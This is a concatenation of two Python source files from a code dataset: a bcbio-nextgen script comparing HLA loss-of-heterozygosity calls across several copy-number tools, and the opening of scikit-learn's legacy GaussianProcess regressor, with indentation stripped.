ALIGNER="novoalign"
DEPTH_FILTER=5
# hg38 coordinates for HLA region https://www.ncbi.nlm.nih.gov/grc/human/regions/MHC
hla_coords = ("chr6", 28510120, 33480577)
def run_sample(tumor, normal, work_dir, cromwell_dir, hla_fa):
hla_fasta, hlas = prep_hla_ref(hla_fa, work_dir)
hla_cromwell_dir = _get_cromwell_execution_dir(cromwell_dir, HLA_GLOB)
sv_cromwell_dir = _get_cromwell_execution_dir(cromwell_dir, SV_GLOB)
tumor_fastq, tumor_calls_orig = get_hla(tumor, hla_cromwell_dir, HLA_GLOB)
tumor_bam = alignment.align_to_sort_bam(tumor_fastq, None, ALIGNER, get_data(tumor, hla_fasta, work_dir))["work_bam"]
normal_fastq, normal_calls_orig = get_hla(normal, hla_cromwell_dir, HLA_GLOB)
normal_bam = alignment.align_to_sort_bam(normal_fastq, None, ALIGNER, get_data(normal, hla_fasta, work_dir))["work_bam"]
tumor_ploidy = prep_ploidy(work_dir, tumor, tumor_bam, sv_cromwell_dir, os.path.join(SV_GLOB, SVCALL_GLOB))
tumor_calls = prep_hla(work_dir, tumor, normal_calls_orig, hlas, normal_bam, tumor_bam)
normal_calls = prep_hla(work_dir, normal, normal_calls_orig, hlas, normal_bam, tumor_bam)
bam_dir, normal_bam_ready = create_tumor_bamdir(tumor, tumor_bam, normal_bam, work_dir)
out_dir = utils.safe_makedir(os.path.join(work_dir, tumor, "lohhla_out"))
prep_bam_inputs(out_dir, tumor, tumor_calls, tumor_bam)
prep_bam_inputs(out_dir, normal, normal_calls, normal_bam)
lohhla_output = os.path.join(out_dir, "%s.%s.DNA.HLAlossPrediction_CI.xls" % (tumor, DEPTH_FILTER))
cmd = ["Rscript", os.path.join(LOHHLA, "LOHHLAscript.R"),
"--patientId", tumor, "--outputDir", out_dir,
"--normalBAMfile", normal_bam_ready, "--BAMDir", bam_dir,
"--hlaPath", normal_calls, "--HLAfastaLoc", hla_fasta,
"--HLAexonLoc", os.path.join(LOHHLA, "data", "hla.dat"),
"--CopyNumLoc", tumor_ploidy,
"--mappingStep", "FALSE",
"--minCoverageFilter", str(DEPTH_FILTER)]
if not os.path.exists(lohhla_output):
subprocess.check_call(cmd)
compare_calls(tumor, lohhla_output, sv_cromwell_dir, os.path.join(SV_GLOB, SVCALL_GLOB))
def _create_plot(tumor, in_glob, out_ext, page=1):
"""Create an output plot for the given PDF in the images directory.
"""
out_dir = utils.safe_makedir("images")
out_name = os.path.join(out_dir, "%s-%s" % (tumor, out_ext))
in_file = glob.glob(in_glob)[0]
cmd = ["pdftoppm", in_file, out_name, "-png", "-f", page, "-singlefile"]
if not os.path.exists(out_name + ".png"):
subprocess.check_call([str(x) for x in cmd])
return out_name + ".png"
def _get_loh_from_calls(calls):
if calls["loh"]:
return "mixed LOH" if calls["std"] else "LOH"
else:
return "no LOH"
def _compare_lohhla(lohhla_output):
print("#### LOHHLA")
print("```")
seen = set([])
calls = collections.defaultdict(int)
with open(lohhla_output) as in_handle:
header = in_handle.readline().strip().split("\t")
for c in in_handle:
vals = dict(zip(header, c.strip().split("\t")))
key = (vals["HLA_A_type1"], vals["HLA_A_type2"])
if key not in seen:
print([vals[x] for x in ["PVal_unique", "HLA_A_type1", "HLA_A_type2", "HLA_type1copyNum_withBAFBin", "HLA_type2copyNum_withBAFBin"]])
seen.add(key)
if float(vals["PVal_unique"]) < 0.01:
calls["loh"] += 1
else:
calls["std"] += 1
print("```")
return _get_loh_from_calls(calls)
def _compare_purecn(tumor, cromwell_dir, sv_glob):
print("#### PureCN")
calls = collections.defaultdict(int)
pure_base_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=tumor, method="purecn", ext="-purecn.csv"))
pure_cn_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=tumor, method="purecn", ext="loh.csv"))
cov_plot = _create_plot(tumor, os.path.join(os.path.dirname(pure_cn_file), "%s*-purecn.pdf" % tumor), "purecn", 2)
sun_plot = _create_plot(tumor, os.path.join(os.path.dirname(pure_cn_file), "%s*-purecn_local_optima.pdf" % tumor),
"purecn-sunrise")
with open(pure_base_file) as in_handle:
vals = dict(zip(in_handle.readline().strip().replace('"', '').split(","),
in_handle.readline().strip().split(",")))
print()
print("| | |")
print("| --- | --- |")
print("| purity | %s |" % vals["Purity"])
print("| ploidy | %s |" % vals["Ploidy"])
print("```")
with open(pure_cn_file) as in_handle:
in_handle.readline() # header
for line in in_handle:
_, chrom, start, end, _, cn, minor_cn = line.split(",")[:7]
start = int(start)
end = int(end)
if chrom == hla_coords[0] and are_overlapping((start, end), hla_coords[1:]):
print(line.strip().split(",")[1:])
if int(minor_cn) == 0:
calls["loh"] += 1
else:
calls["std"] += 1
print("```")
print("" % (tumor, cov_plot))
print("" % (tumor, sun_plot))
return _get_loh_from_calls(calls)
def _compare_titancna(tumor, cromwell_dir, sv_glob):
print("#### TitanCNA")
calls = collections.defaultdict(int)
titancna_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=tumor, method="titancna", ext="Clusters.txt"))
with open(titancna_file) as in_handle:
vals = dict(zip(in_handle.readline().strip().split("\t"), in_handle.readline().strip().split("\t")))
path = vals["path"]
init_dir, check_dir = os.path.dirname(titancna_file).split("/", 1)
rel_path = init_dir + "/" + path[path.find(check_dir):]
print()
print("| | |")
print("| --- | --- |")
print("| purity | %s |" % vals["purity"])
print("| ploidy | %s |" % vals["ploidy"])
cna_plot = _create_plot(tumor, os.path.join(rel_path, "%s*_CNA.pdf" % tumor), "titan-cna")
loh_plot = _create_plot(tumor, os.path.join(rel_path, "%s*_LOH.pdf" % tumor), "titan-loh")
seg_file = rel_path + ".segs.txt"
out_keys = ["Chromosome", "Start_Position.bp.", "End_Position.bp.", "Copy_Number",
"MinorCN", "MajorCN", "TITAN_call"]
print("```")
with open(seg_file) as in_handle:
header = in_handle.readline().strip().split()
for line in in_handle:
val = dict(zip(header, line.strip().split()))
start = int(val["Start_Position.bp."])
end = int(val["End_Position.bp."])
if val["Chromosome"] == hla_coords[0] and are_overlapping((start, end), hla_coords[1:]):
print([val[k] for k in out_keys])
if int(val["MinorCN"]) == 0:
calls["loh"] += 1
else:
calls["std"] += 1
print("```")
print("" % (tumor, cna_plot))
print("" % (tumor, loh_plot))
return _get_loh_from_calls(calls)
def _compare_gatkcnv(tumor, cromwell_dir, sv_glob):
print("#### GATK CNV")
gatk_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=tumor, method="gatk-cnv", ext="-call.seg"))
orig_model_file = gatk_file.replace("-call.seg", ".modeled.png")
model_file = os.path.join("images", os.path.basename(orig_model_file))
shutil.copy(orig_model_file, model_file)
print("```")
with open(gatk_file) as in_handle:
for line in in_handle:
if not line.startswith("@"):
chrom, start, end = line.split()[:3]
if chrom == hla_coords[0] and are_overlapping((int(start), int(end)), hla_coords[1:]):
print(line.strip())
print("```")
print("" % (tumor, model_file))
def compare_calls(tumor, lohhla_output, cromwell_dir, sv_glob):
summary = collections.OrderedDict()
print("### %s" % tumor)
orig_stdout = sys.stdout
sys.stdout = io.StringIO()
summary["LOHHLA"] = _compare_lohhla(lohhla_output)
summary["PureCN"] = _compare_purecn(tumor, cromwell_dir, sv_glob)
summary["TitanCNA"] = _compare_titancna(tumor, cromwell_dir, sv_glob)
saved_stdout = sys.stdout
sys.stdout = orig_stdout
print()
print("| | |")
print("| --- | --- |")
for k, v in summary.items():
print("| %s | %s |" % (k, v))
sys.stdout.write(saved_stdout.getvalue())
# print("#### CNVkit")
# cnvkit_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=tumor, method="cnvkit", ext="-call.cns"))
# out_keys = ["chromosome", "start", "end", "cn", "cn1", "cn2"]
# print("```")
# with open(cnvkit_file) as in_handle:
# header = in_handle.readline().strip().split()
# for line in in_handle:
# chrom, start, end = line.split()[:3]
# if chrom == hla_coords[0] and are_overlapping((int(start), int(end)), hla_coords[1:]):
# vals = dict(zip(header, line.strip().split()))
# print([vals[k] for k in out_keys])
# print("```")
print
def are_overlapping(r, s):
"""Test if two coordinates overlap.
https://stackoverflow.com/a/27182551
"""
return r[1] >= s[0] and s[1] >= r[0]
def _get_cromwell_file(cromwell_dir, file_glob, kwargs):
fglob = os.path.join(cromwell_dir, file_glob.format(**kwargs))
fs = glob.glob(fglob)
assert len(fs) == 1, (fglob, fs)
return fs[0]
def _get_cromwell_execution_dir(base_dir, target_glob):
"""Retrieve the baseline directory with cromwell output files.
Handles Cromwell restarts where there are multiple work directories and
we traverse symlinks back to the original.
"""
cur_dir = glob.glob(os.path.join(base_dir, target_glob))[0]
if os.path.exists(os.path.join(cur_dir, "cwl.output.json")):
return base_dir
else:
symlink_dir = os.path.dirname(os.path.realpath(os.path.join(cur_dir, "script")))
ref_base = os.path.dirname(base_dir)
new_guid = symlink_dir[symlink_dir.find(ref_base) + len(ref_base) + 1:].split("/")[0]
return _get_cromwell_execution_dir(os.path.join(ref_base, new_guid), target_glob)
def prep_bam_inputs(out_dir, sample, call_file, bam_file):
"""Prepare expected input BAM files from pre-aligned.
"""
base = utils.splitext_plus(os.path.basename(bam_file))[0]
with open(call_file) as in_handle:
for cur_hla in (x.strip() for x in in_handle):
out_file = os.path.join(utils.safe_makedir(os.path.join(out_dir, base)),
"%s.type.%s.filtered.bam" % (base, cur_hla))
if not os.path.exists(out_file):
cmd = ["samtools", "view", "-b","-o", out_file, bam_file, cur_hla]
subprocess.check_call(cmd)
def create_tumor_bamdir(tumor, tumor_bam, normal_bam, work_dir):
"""Create expected input directory with tumor/normal BAMs in one place.
"""
bam_dir = utils.safe_makedir(os.path.join(work_dir, tumor, "in_bams"))
normal_bam_ready = os.path.join(bam_dir, os.path.basename(normal_bam))
utils.symlink_plus(normal_bam, normal_bam_ready)
tumor_bam_ready = os.path.join(bam_dir, os.path.basename(tumor_bam))
utils.symlink_plus(tumor_bam, tumor_bam_ready)
return bam_dir, normal_bam_ready
def get_data(sample, hla_fasta, work_dir):
return {"dirs": {"work": work_dir},
"config": {"analysis": "variant", "algorithm": {"multiple_mappers": "All 9999"},
"resources": {"novoalign": {"options": ["-R", "0"]}}},
"reference": {"bwa": {"indexes": hla_fasta + ".bwt"},
"novoalign": {"indexes": [hla_fasta + ".ndx"]}},
"rgnames": {"sample": sample, "rg": sample, "pl": "illumina", "pu": sample, "lane": sample}}
def get_hla(sample, cromwell_dir, hla_glob):
"""Retrieve HLA calls and input fastqs for a sample.
"""
hla_dir = glob.glob(os.path.join(cromwell_dir, hla_glob, "align", sample, "hla"))[0]
fastq = os.path.join(hla_dir, "OptiType-HLA-A_B_C-input.fq")
calls = os.path.join(hla_dir, "%s-optitype.csv" % sample)
return fastq, calls
def name_to_absolute(x):
"""Convert standard hg38 HLA name into ABSOLUTE naming.
"""
for c in ["-", "*", ":"]:
x = x.replace(c, "_")
x = x.lower()
return x
def get_hla_choice(h, hlas, normal_bam, tumor_bam):
"""Retrieve matching HLA with best read support in both tumor and normal
"""
def get_counts(bam_file):
counts = {}
for line in subprocess.check_output(["samtools", "idxstats", bam_file]).split("\n"):
if line.startswith(h):
name, _, count, _ = line.split()
counts[name] = int(count)
return counts
tcounts = get_counts(tumor_bam)
ncounts = get_counts(normal_bam)
check_hlas = [x for x in hlas if x.startswith(h) and tcounts.get(x, 0) > 0 and ncounts.get(x, 0) > 0]
cur_hlas = sorted(check_hlas, key=lambda x: ncounts[x], reverse=True)
#print(cur_hlas[0], tcounts.get(cur_hlas[0]), ncounts.get(cur_hlas[0]))
return cur_hlas[0]
def prep_hla(work_dir, sample, calls, hlas, normal_bam, tumor_bam):
"""Convert HLAs into ABSOLUTE format for use with LOHHLA.
LOHHLA hard codes names to hla_a, hla_b, hla_c so need to move
"""
work_dir = utils.safe_makedir(os.path.join(work_dir, sample, "inputs"))
hla_file = os.path.join(work_dir, "%s-hlas.txt" % sample)
with open(calls) as in_handle:
with open(hla_file, "w") as out_handle:
next(in_handle) # header
for line in in_handle:
_, _, a, _, _ = line.strip().split(",")
a1, a2 = a.split(";")
out_handle.write(get_hla_choice(name_to_absolute(a1), hlas, normal_bam, tumor_bam) + "\n")
out_handle.write(get_hla_choice(name_to_absolute(a2), hlas, normal_bam, tumor_bam) + "\n")
return hla_file
def prep_ploidy(work_dir, sample, bam_file, cromwell_dir, sv_glob):
"""Create LOHHLA compatible input ploidy file from PureCN output.
"""
purecn_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=sample, method="purecn", ext="purecn.csv"))
work_dir = utils.safe_makedir(os.path.join(work_dir, sample, "inputs"))
out_file = os.path.join(work_dir, "%s-solutions.txt" % sample)
with open(purecn_file) as in_handle:
reader = csv.reader(in_handle)
purecn_stats = dict(zip(next(reader), next(reader)))
with open(out_file, "w") as out_handle:
out_handle.write("Ploidy\ttumorPurity\ttumorPloidy\n")
lohhla_name = utils.splitext_plus(os.path.basename(bam_file))[0]
out_handle.write("%s\t%s\t%s\t%s\n" % (lohhla_name, purecn_stats["Ploidy"],
purecn_stats["Purity"], purecn_stats["Ploidy"]))
return out_file
def prep_hla_ref(hla_fasta, work_dir):
work_dir = utils.safe_makedir(os.path.join(work_dir, "hlaref"))
out_file = os.path.join(work_dir, os.path.basename(hla_fasta))
seen_names = set([])
if not utils.file_uptodate(out_file, hla_fasta):
with open(hla_fasta) as in_handle:
with open(out_file, "w") as out_handle:
for line in in_handle:
if line.startswith(">"):
cur_name = name_to_absolute(line.strip().split()[1])
if cur_name not in seen_names:
out_handle.write(">%s\n" % cur_name)
seen_names.add(cur_name)
write_seq = True
else:
write_seq = False
elif write_seq:
out_handle.write(line)
if not os.path.exists(out_file + ".bwt"):
subprocess.check_call(["bwa", "index", out_file])
if not os.path.exists(out_file + ".ndx"):
subprocess.check_call(["novoindex", out_file + ".ndx", out_file])
hlas = []
with open(out_file) as in_handle:
for line in in_handle:
if line.startswith(">"):
hlas.append(line[1:].strip())
return out_file, hlas
def samples_from_config(sample_yaml):
with open(sample_yaml) as in_handle:
config = yaml.safe_load(in_handle)
by_batch = collections.defaultdict(dict)
for s in config["details"]:
by_batch[s["metadata"]["batch"]][s["metadata"]["phenotype"]] = s["description"]
for bid in sorted(by_batch.keys()):
yield by_batch[bid]["tumor"], by_batch[bid]["normal"]
if __name__ == "__main__":
sample_config, hla_fa, cromwell_dir = sys.argv[1:]
work_dir = utils.safe_makedir(os.path.join(os.getcwd(), "work_lohhla"))
for t, n in sorted(samples_from_config(sample_config)):
run_sample(t, n, work_dir, cromwell_dir, hla_fa)
| a113n/bcbio-nextgen | scripts/utils/hla_loh_comparison.py | Python | mit | 17,689 | [
"BWA"
] | 918c99450c3d5848627fc22ea6852df1890c0350a638c89216073111f901d20c |
# -*- coding: utf-8 -*-
# Author: Vincent Dubourg <vincent.dubourg@gmail.com>
# (mostly translation, see implementation details)
# Licence: BSD 3 clause
from __future__ import print_function
import numpy as np
from scipy import linalg, optimize
from ..base import BaseEstimator, RegressorMixin
from ..metrics.pairwise import manhattan_distances
from ..utils import check_random_state, check_array, check_X_y
from ..utils.validation import check_is_fitted
from . import regression_models as regression
from . import correlation_models as correlation
from ..utils import deprecated
MACHINE_EPSILON = np.finfo(np.double).eps
@deprecated("l1_cross_distances is deprecated and will be removed in 0.20.")
def l1_cross_distances(X):
"""
Computes the nonzero componentwise L1 cross-distances between the vectors
in X.
Parameters
----------
X: array_like
An array with shape (n_samples, n_features)
Returns
-------
D: array with shape (n_samples * (n_samples - 1) / 2, n_features)
The array of componentwise L1 cross-distances.
ij: arrays with shape (n_samples * (n_samples - 1) / 2, 2)
The indices i and j of the vectors in X associated to the cross-
distances in D: D[k] = np.abs(X[ij[k, 0]] - Y[ij[k, 1]]).
"""
X = check_array(X)
n_samples, n_features = X.shape
n_nonzero_cross_dist = n_samples * (n_samples - 1) // 2
ij = np.zeros((n_nonzero_cross_dist, 2), dtype=np.int)
D = np.zeros((n_nonzero_cross_dist, n_features))
ll_1 = 0
for k in range(n_samples - 1):
ll_0 = ll_1
ll_1 = ll_0 + n_samples - k - 1
ij[ll_0:ll_1, 0] = k
ij[ll_0:ll_1, 1] = np.arange(k + 1, n_samples)
D[ll_0:ll_1] = np.abs(X[k] - X[(k + 1):n_samples])
return D, ij
@deprecated("GaussianProcess is deprecated and will be removed in 0.20. "
"Use the GaussianProcessRegressor instead.")
class GaussianProcess(BaseEstimator, RegressorMixin):
"""The legacy Gaussian Process model class.
Note that this class is deprecated and will be removed in 0.20.
Use the GaussianProcessRegressor instead.
Read more in the :ref:`User Guide <gaussian_process>`.
Parameters
----------
regr : string or callable, optional
A regression function returning an array of outputs of the linear
regression functional basis. The number of observations n_samples
should be greater than the size p of this basis.
Default assumes a simple constant regression trend.
Available built-in regression models are::
'constant', 'linear', 'quadratic'
corr : string or callable, optional
A stationary autocorrelation function returning the autocorrelation
between two points x and x'.
Default assumes a squared-exponential autocorrelation model.
Built-in correlation models are::
'absolute_exponential', 'squared_exponential',
'generalized_exponential', 'cubic', 'linear'
beta0 : double array_like, optional
The regression weight vector to perform Ordinary Kriging (OK).
Default assumes Universal Kriging (UK) so that the vector beta of
regression weights is estimated using the maximum likelihood
principle.
storage_mode : string, optional
A string specifying whether the Cholesky decomposition of the
correlation matrix should be stored in the class (storage_mode =
'full') or not (storage_mode = 'light').
Default assumes storage_mode = 'full', so that the
Cholesky decomposition of the correlation matrix is stored.
This might be a useful parameter when one is not interested in the
MSE and only plan to estimate the BLUP, for which the correlation
matrix is not required.
verbose : boolean, optional
A boolean specifying the verbose level.
Default is verbose = False.
theta0 : double array_like, optional
An array with shape (n_features, ) or (1, ).
The parameters in the autocorrelation model.
If thetaL and thetaU are also specified, theta0 is considered as
the starting point for the maximum likelihood estimation of the
best set of parameters.
Default assumes isotropic autocorrelation model with theta0 = 1e-1.
thetaL : double array_like, optional
An array with shape matching theta0's.
Lower bound on the autocorrelation parameters for maximum
likelihood estimation.
Default is None, so that it skips maximum likelihood estimation and
it uses theta0.
thetaU : double array_like, optional
An array with shape matching theta0's.
Upper bound on the autocorrelation parameters for maximum
likelihood estimation.
Default is None, so that it skips maximum likelihood estimation and
it uses theta0.
normalize : boolean, optional
Input X and observations y are centered and reduced wrt
means and standard deviations estimated from the n_samples
observations provided.
Default is normalize = True so that data is normalized to ease
maximum likelihood estimation.
nugget : double or ndarray, optional
Introduce a nugget effect to allow smooth predictions from noisy
data. If nugget is an ndarray, it must be the same length as the
number of data points used for the fit.
The nugget is added to the diagonal of the assumed training covariance;
in this way it acts as a Tikhonov regularization in the problem. In
the special case of the squared exponential correlation function, the
nugget mathematically represents the variance of the input values.
Default assumes a nugget close to machine precision for the sake of
robustness (nugget = 10. * MACHINE_EPSILON).
optimizer : string, optional
A string specifying the optimization algorithm to be used.
Default uses 'fmin_cobyla' algorithm from scipy.optimize.
Available optimizers are::
'fmin_cobyla', 'Welch'
'Welch' optimizer is dued to Welch et al., see reference [WBSWM1992]_.
It consists in iterating over several one-dimensional optimizations
instead of running one single multi-dimensional optimization.
random_start : int, optional
The number of times the Maximum Likelihood Estimation should be
performed from a random starting point.
The first MLE always uses the specified starting point (theta0),
the next starting points are picked at random according to an
exponential distribution (log-uniform on [thetaL, thetaU]).
Default does not use random starting point (random_start = 1).
random_state: integer or numpy.RandomState, optional
The generator used to shuffle the sequence of coordinates of theta in
the Welch optimizer. If an integer is given, it fixes the seed.
Defaults to the global numpy random number generator.
Attributes
----------
theta_ : array
Specified theta OR the best set of autocorrelation parameters (the \
sought maximizer of the reduced likelihood function).
reduced_likelihood_function_value_ : array
The optimal reduced likelihood function value.
Examples
--------
>>> import numpy as np
>>> from sklearn.gaussian_process import GaussianProcess
>>> X = np.array([[1., 3., 5., 6., 7., 8.]]).T
>>> y = (X * np.sin(X)).ravel()
>>> gp = GaussianProcess(theta0=0.1, thetaL=.001, thetaU=1.)
>>> gp.fit(X, y) # doctest: +ELLIPSIS
GaussianProcess(beta0=None...
...
Notes
-----
The presentation implementation is based on a translation of the DACE
Matlab toolbox, see reference [NLNS2002]_.
References
----------
.. [NLNS2002] `H.B. Nielsen, S.N. Lophaven, H. B. Nielsen and J.
Sondergaard. DACE - A MATLAB Kriging Toolbox.` (2002)
http://imedea.uib-csic.es/master/cambioglobal/Modulo_V_cod101615/Lab/lab_maps/krigging/DACE-krigingsoft/dace/dace.pdf
.. [WBSWM1992] `W.J. Welch, R.J. Buck, J. Sacks, H.P. Wynn, T.J. Mitchell,
and M.D. Morris (1992). Screening, predicting, and computer
experiments. Technometrics, 34(1) 15--25.`
http://www.jstor.org/pss/1269548
"""
_regression_types = {
'constant': regression.constant,
'linear': regression.linear,
'quadratic': regression.quadratic}
_correlation_types = {
'absolute_exponential': correlation.absolute_exponential,
'squared_exponential': correlation.squared_exponential,
'generalized_exponential': correlation.generalized_exponential,
'cubic': correlation.cubic,
'linear': correlation.linear}
_optimizer_types = [
'fmin_cobyla',
'Welch']
def __init__(self, regr='constant', corr='squared_exponential', beta0=None,
storage_mode='full', verbose=False, theta0=1e-1,
thetaL=None, thetaU=None, optimizer='fmin_cobyla',
random_start=1, normalize=True,
nugget=10. * MACHINE_EPSILON, random_state=None):
self.regr = regr
self.corr = corr
self.beta0 = beta0
self.storage_mode = storage_mode
self.verbose = verbose
self.theta0 = theta0
self.thetaL = thetaL
self.thetaU = thetaU
self.normalize = normalize
self.nugget = nugget
self.optimizer = optimizer
self.random_start = random_start
self.random_state = random_state
def fit(self, X, y):
"""
The Gaussian Process model fitting method.
Parameters
----------
X : double array_like
An array with shape (n_samples, n_features) with the input at which
observations were made.
y : double array_like
An array with shape (n_samples, ) or shape (n_samples, n_targets)
with the observations of the output to be predicted.
Returns
-------
gp : self
A fitted Gaussian Process model object awaiting data to perform
predictions.
"""
# Run input checks
self._check_params()
self.random_state = check_random_state(self.random_state)
# Force data to 2D numpy.array
X, y = check_X_y(X, y, multi_output=True, y_numeric=True)
self.y_ndim_ = y.ndim
if y.ndim == 1:
y = y[:, np.newaxis]
# Check shapes of DOE & observations
n_samples, n_features = X.shape
_, n_targets = y.shape
# Run input checks
self._check_params(n_samples)
# Normalize data or don't
if self.normalize:
X_mean = np.mean(X, axis=0)
X_std = np.std(X, axis=0)
y_mean = np.mean(y, axis=0)
y_std = np.std(y, axis=0)
X_std[X_std == 0.] = 1.
y_std[y_std == 0.] = 1.
# center and scale X if necessary
X = (X - X_mean) / X_std
y = (y - y_mean) / y_std
else:
X_mean = np.zeros(1)
X_std = np.ones(1)
y_mean = np.zeros(1)
y_std = np.ones(1)
# Calculate matrix of distances D between samples
D, ij = l1_cross_distances(X)
if (np.min(np.sum(D, axis=1)) == 0.
and self.corr != correlation.pure_nugget):
raise Exception("Multiple input features cannot have the same"
" target value.")
# Regression matrix and parameters
F = self.regr(X)
n_samples_F = F.shape[0]
if F.ndim > 1:
p = F.shape[1]
else:
p = 1
if n_samples_F != n_samples:
raise Exception("Number of rows in F and X do not match. Most "
"likely something is going wrong with the "
"regression model.")
if p > n_samples_F:
raise Exception(("Ordinary least squares problem is undetermined "
"n_samples=%d must be greater than the "
"regression model size p=%d.") % (n_samples, p))
if self.beta0 is not None:
if self.beta0.shape[0] != p:
raise Exception("Shapes of beta0 and F do not match.")
# Set attributes
self.X = X
self.y = y
self.D = D
self.ij = ij
self.F = F
self.X_mean, self.X_std = X_mean, X_std
self.y_mean, self.y_std = y_mean, y_std
# Determine Gaussian Process model parameters
if self.thetaL is not None and self.thetaU is not None:
# Maximum Likelihood Estimation of the parameters
if self.verbose:
print("Performing Maximum Likelihood Estimation of the "
"autocorrelation parameters...")
self.theta_, self.reduced_likelihood_function_value_, par = \
self._arg_max_reduced_likelihood_function()
if np.isinf(self.reduced_likelihood_function_value_):
raise Exception("Bad parameter region. "
"Try increasing upper bound")
else:
# Given parameters
if self.verbose:
print("Given autocorrelation parameters. "
"Computing Gaussian Process model parameters...")
self.theta_ = self.theta0
self.reduced_likelihood_function_value_, par = \
self.reduced_likelihood_function()
if np.isinf(self.reduced_likelihood_function_value_):
raise Exception("Bad point. Try increasing theta0.")
self.beta = par['beta']
self.gamma = par['gamma']
self.sigma2 = par['sigma2']
self.C = par['C']
self.Ft = par['Ft']
self.G = par['G']
if self.storage_mode == 'light':
# Delete heavy data (it will be computed again if required)
# (it is required only when MSE is wanted in self.predict)
if self.verbose:
print("Light storage mode specified. "
"Flushing autocorrelation matrix...")
self.D = None
self.ij = None
self.F = None
self.C = None
self.Ft = None
self.G = None
return self
def predict(self, X, eval_MSE=False, batch_size=None):
"""
This function evaluates the Gaussian Process model at x.
Parameters
----------
X : array_like
An array with shape (n_eval, n_features) giving the point(s) at
which the prediction(s) should be made.
eval_MSE : boolean, optional
A boolean specifying whether the Mean Squared Error should be
evaluated or not.
Default assumes evalMSE = False and evaluates only the BLUP (mean
prediction).
batch_size : integer, optional
An integer giving the maximum number of points that can be
evaluated simultaneously (depending on the available memory).
Default is None so that all given points are evaluated at the same
time.
Returns
-------
y : array_like, shape (n_samples, ) or (n_samples, n_targets)
An array with shape (n_eval, ) if the Gaussian Process was trained
on an array of shape (n_samples, ) or an array with shape
(n_eval, n_targets) if the Gaussian Process was trained on an array
of shape (n_samples, n_targets) with the Best Linear Unbiased
Prediction at x.
MSE : array_like, optional (if eval_MSE == True)
An array with shape (n_eval, ) or (n_eval, n_targets) as with y,
with the Mean Squared Error at x.
"""
check_is_fitted(self, "X")
# Check input shapes
X = check_array(X)
n_eval, _ = X.shape
n_samples, n_features = self.X.shape
n_samples_y, n_targets = self.y.shape
# Run input checks
self._check_params(n_samples)
if X.shape[1] != n_features:
raise ValueError(("The number of features in X (X.shape[1] = %d) "
"should match the number of features used "
"for fit() "
"which is %d.") % (X.shape[1], n_features))
if batch_size is None:
# No memory management
# (evaluates all given points in a single batch run)
# Normalize input
X = (X - self.X_mean) / self.X_std
# Initialize output
y = np.zeros(n_eval)
if eval_MSE:
MSE = np.zeros(n_eval)
# Get pairwise componentwise L1-distances to the input training set
dx = manhattan_distances(X, Y=self.X, sum_over_features=False)
# Get regression function and correlation
f = self.regr(X)
r = self.corr(self.theta_, dx).reshape(n_eval, n_samples)
# Scaled predictor
y_ = np.dot(f, self.beta) + np.dot(r, self.gamma)
# Predictor
y = (self.y_mean + self.y_std * y_).reshape(n_eval, n_targets)
if self.y_ndim_ == 1:
y = y.ravel()
# Mean Squared Error
if eval_MSE:
C = self.C
if C is None:
# Light storage mode (need to recompute C, F, Ft and G)
if self.verbose:
print("This GaussianProcess used 'light' storage mode "
"at instantiation. Need to recompute "
"autocorrelation matrix...")
reduced_likelihood_function_value, par = \
self.reduced_likelihood_function()
self.C = par['C']
self.Ft = par['Ft']
self.G = par['G']
rt = linalg.solve_triangular(self.C, r.T, lower=True)
if self.beta0 is None:
# Universal Kriging
u = linalg.solve_triangular(self.G.T,
np.dot(self.Ft.T, rt) - f.T,
lower=True)
else:
# Ordinary Kriging
u = np.zeros((n_targets, n_eval))
MSE = np.dot(self.sigma2.reshape(n_targets, 1),
(1. - (rt ** 2.).sum(axis=0)
+ (u ** 2.).sum(axis=0))[np.newaxis, :])
MSE = np.sqrt((MSE ** 2.).sum(axis=0) / n_targets)
# Mean Squared Error might be slightly negative depending on
# machine precision: force to zero!
MSE[MSE < 0.] = 0.
if self.y_ndim_ == 1:
MSE = MSE.ravel()
return y, MSE
else:
return y
else:
# Memory management
if type(batch_size) is not int or batch_size <= 0:
raise Exception("batch_size must be a positive integer")
if eval_MSE:
y, MSE = np.zeros(n_eval), np.zeros(n_eval)
for k in range(max(1, n_eval / batch_size)):
batch_from = k * batch_size
batch_to = min([(k + 1) * batch_size + 1, n_eval + 1])
y[batch_from:batch_to], MSE[batch_from:batch_to] = \
self.predict(X[batch_from:batch_to],
eval_MSE=eval_MSE, batch_size=None)
return y, MSE
else:
y = np.zeros(n_eval)
for k in range(max(1, n_eval / batch_size)):
batch_from = k * batch_size
batch_to = min([(k + 1) * batch_size + 1, n_eval + 1])
y[batch_from:batch_to] = \
self.predict(X[batch_from:batch_to],
eval_MSE=eval_MSE, batch_size=None)
return y
def reduced_likelihood_function(self, theta=None):
"""
This function determines the BLUP parameters and evaluates the reduced
likelihood function for the given autocorrelation parameters theta.
Maximizing this function wrt the autocorrelation parameters theta is
equivalent to maximizing the likelihood of the assumed joint Gaussian
distribution of the observations y evaluated onto the design of
experiments X.
Parameters
----------
theta : array_like, optional
An array containing the autocorrelation parameters at which the
Gaussian Process model parameters should be determined.
Default uses the built-in autocorrelation parameters
(ie ``theta = self.theta_``).
Returns
-------
reduced_likelihood_function_value : double
The value of the reduced likelihood function associated to the
given autocorrelation parameters theta.
par : dict
A dictionary containing the requested Gaussian Process model
parameters:
sigma2
Gaussian Process variance.
beta
Generalized least-squares regression weights for
Universal Kriging or given beta0 for Ordinary
Kriging.
gamma
Gaussian Process weights.
C
Cholesky decomposition of the correlation matrix [R].
Ft
Solution of the linear equation system : [R] x Ft = F
G
QR decomposition of the matrix Ft.
"""
check_is_fitted(self, "X")
if theta is None:
# Use built-in autocorrelation parameters
theta = self.theta_
# Initialize output
reduced_likelihood_function_value = - np.inf
par = {}
# Retrieve data
n_samples = self.X.shape[0]
D = self.D
ij = self.ij
F = self.F
if D is None:
# Light storage mode (need to recompute D, ij and F)
D, ij = l1_cross_distances(self.X)
if (np.min(np.sum(D, axis=1)) == 0.
and self.corr != correlation.pure_nugget):
raise Exception("Multiple X are not allowed")
F = self.regr(self.X)
# Set up R
r = self.corr(theta, D)
R = np.eye(n_samples) * (1. + self.nugget)
R[ij[:, 0], ij[:, 1]] = r
R[ij[:, 1], ij[:, 0]] = r
# Cholesky decomposition of R
try:
C = linalg.cholesky(R, lower=True)
except linalg.LinAlgError:
return reduced_likelihood_function_value, par
# Get generalized least squares solution
